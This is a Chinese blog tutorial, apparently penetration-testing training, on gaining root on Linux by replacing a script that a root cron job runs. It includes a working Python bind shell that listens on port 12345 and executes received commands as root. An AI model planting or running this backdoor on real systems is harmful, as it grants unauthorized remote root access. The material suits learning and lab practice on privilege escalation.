计划任务提权crontab提权

最新推荐文章于 2024-04-14 21:21:00 发布
最新推荐文章于 2024-04-14 21:21:00 发布
阅读量259 收藏 1
点赞数
文章标签: 网络 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nvhack/article/details/128735882
版权

利用系统 会周期性的去执行特定的指令来提权
在kali下面输入命令:

cat /etc/crontab

在这里插入图片描述
我们修改/etc/crontab 添加一行内容
在这里插入图片描述
nanhack.py 代码如下
在这里插入图片描述
文件已经创建成功,因为是root权限执行,当前目录直接在root目录

提权方法:

我们替换nanhack.py 为其他内容

import socket
import os
#AF_INET 代表ipv4 SOCK_STREAM==>tcp
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 12345))
s.listen(5)

while True:
        conn, addr = s.accept()
        for i in range(10):
                cmd = conn.recv(1024)
                print(cmd)
                command = cmd.decode(encoding='utf-8')
                if command.startswith("cd"):
                        os.chdir(command[2:].strip())
                        result = os.getcwd()
                else:
                        result = os.popen(command).read()
                if result:
                        conn.send(result.encode('utf-8'))
                else:
                        conn.send(b'ok')

此段内容为不断监听12345端口,并等待其他机器链接,并执行传递的命令
在这里插入图片描述
等待目标执行后,我们启动客户端 client.py
在这里插入图片描述
执行后:
在这里插入图片描述
提权成功!

必火网络安全培训学院
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
操作系统权限提升(二十)之Linux提权-计划任务提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 912
先准备一个SUID文件或者权限为xx7的文件,让低权限的用户可以执行文件的修改,在这里我们我们准备一个sh文件或者python文件都可以,我们写一个linux运维脚本,来监控当前电脑的运行参数。linux计划任务提权是因为权限配置不当,计划任务以root权限运行,低权限的用户可以修改计划任务的文件,从而被攻击者利用,导致提权Linux计划任务命令如下。linux文件权第一部分是该文件的拥有者所拥有的权限,第二部分是该文件所在用户组的用户所拥有的权限,最后一部分是其他用户所拥有的权限。
RHCE(十七)计划任务——at和crontab
01-09
计划任务两种计划任务单次的计划任务——at周期性的计划任务——crontab文件格式用法指定某些用户可以执行计划任务用/etc/crontab添加计划任务crontab -e 和 /etc/crontab 区别 两种计划任务 单次的计划任务 周期性...
linux计划任务提权,Linux crontab提权攻击
weixin_36046580的博客
05-16 1921
crontab定时任务是LINUX上最常用的一个功能,不过使用不当很容易受到提权。使用crontab时请注意以下两点:crontab任务千万不要写到/etc/crontab文件里,这是很危险的。通过crontab -e去创建,让他写到默认的/var/spool/cron下;能不用 root 去创建尽量不用,如果一定要用root,请保存到一个其他用户进不去、改不了、看不了的位置(最好能用chattr...
linux添加crontab执行权限,linux 提权-Crontab提权
weixin_35545563的博客
05-10 617
前言记录一下linux提权系列的Crontab计划任务提权的学习过程。crontab 命令crontab命令用来定期执行程序。注意:新创建的 cron 任务,不会马上执行,至少要过2分钟后才可以-e 编辑当前的crontab文件,默认保存在/var/spool/cron/用户名下-r 删除目前的时程表-l 列出目前的时程表语法格式分 时 日 月 周 需要执行的命令分:0~59时:0~2...
Crond计划任务和用户权限提升
l187567的博客
08-14 474
计划任务是在指定的时间间隔内自动执行的任务。在Linux系统中,常用的计划任务工具是crond(cron daemon)。用户可以通过创建cron job(计划任务)来定期执行指定的命令或脚本。用户权限提升是指在执行某些需要超级用户权限(root权限)才能进行的操作时,普通用户通过使用sudo命令来获得临时的超级用户权限。总体来说,Crond计划任务和用户权限提升是Linux系统中非常有用的功能。
Linux 定时任务提权
大河之犬的博客
06-19 1714
定时任务(cron job)是Linux系统中的一个守护进程,用于调度重复任务,通过配置crontab可以让系统周期性地执行某些命令或者脚本。cron 是 Linux 系统中最为实用的工具之一,但是也可能被黑客用于提权操作。由于cron通常以root特权运行,如果我们可以修改其调度的任何脚本或二进制文件,那么便可以使用root权限执行任意代码。
计划任务提权
一只web狗
06-30 1322
计划任务提权
107.网络安全渗透测试—[权限提升篇5]—[Linux Cron Jobs 提权]
qwsn
07-04 1929
Cron Jobs,顾名思义,是定时/计划任务的意思。root用户通过文件,可以设定系统定期执行一些预设的任务。特别需要注意的是:crontab 文件只能是在root权限下进行编辑。 当我们得到一个权限的远程登录用户的时候,并且可以查看文件的内容,与此同时文件中的某个定时任务,存在短期内执行的且是当前用户可编辑执行的脚本。假设,我们此时在该脚本文件中给某个shell命令(使用命令cat /etc/shells可以查看当前系统的可用shell命令)赋予suid权限,由于这些shell命令的所有者
Ubuntu计划任务_crontab
11-23
如何定时启动shell脚本 写好shell 脚本 创建和编辑 crontab 文件 验证 crontab 文件是否存在
linux使用crontab实现PHP执行计划定时任务
10-25
前几天写过一篇文章,利用单纯的php实现定时执行任务,但是效率不佳,对于linux来说用crontab实现更加合理
CentOS7计划任务crontab1
08-08
1、查看crontab文件crontab -l [-u 用户名]root用户可以用-u参数查看指定用户的计划任务,如果没有-u参数,表示查看自己的计划任务 2、
Linux计划任务crontab运行脚本不正确的问题
01-09
 写好的程序希望在崩溃之后能够自启动,于是利用linuxcrontab功能,添加一个计划任务,每分钟执行一个脚本查看需要监控的进程是否还在,如果不在则启动之,否则不做任何事情。这么一个简单的脚本在crontab中运行...
提权 - Linux(二)
acepanhuan的博客
03-06 427
提权 - Linux(二)
crontab定时任务及权限
w991304848的博客
09-25 1220
https://blog.51cto.com/weimouren/1736063
LINUX提权计划任务提权
小王的储物间
12-14 755
总结一下本文的知识点,讲了计划任务提权常用的两种方法以及漏洞探针的安装及使用,有兴趣的小伙伴可以自己尝试去搭建靶机提权,如果喜欢本文不妨一键三连。
linux下新增/修改crontab任务的方式总结(centos/debian)
空山新雨后,天气晚来秋
01-28 6510
linux下新增/修改crontab任务的方式总结(centos/debian)
操作系统权限提升(十)之系统错误配置-计划任务提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-02 488
计划任务提权的原理非常的简单,就是在设置计划任务的时候配置不当,导致我们可以更改计划任务执行的文件,我们可以进行劫持然后替换成自己的恶意文件达到提权的目的
liunx 下 crontab 被植入脚本后提权问题,当你要添加任务时,报错:权限不够!
Lonelypatients°的博客
06-22 858
首先来看图: 明显被篡改权限, 我们可以使用 lsattr 和 chattr # 查看隐藏属性 [root]: lsattr /var/spool/cron/ 2. 不管它有没有, 执行 chattr [root]: chattr /var/spool/cron/ 当然执行完之后还是不行, 我找到了另一个方法 # cd 进入目录 [root]: cd /var/spool/cron/ [root]: lsattr www-data 结果他 的隐藏属性 带 e , 也有可能各不相同同
Linux 网络排查命令
最新发布
学习记录
04-14 506
学习记录
linux计划任务提权
09-22
Linux计划任务提权是一种利用权限配置不当的计划任务来提升权限的方法。当某个计划任务以root身份运行,并且可以被低权限用户编辑时,攻击者可以修改计划任务的文件,从而实现提权。具体步骤如下: 1. 使用命令`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值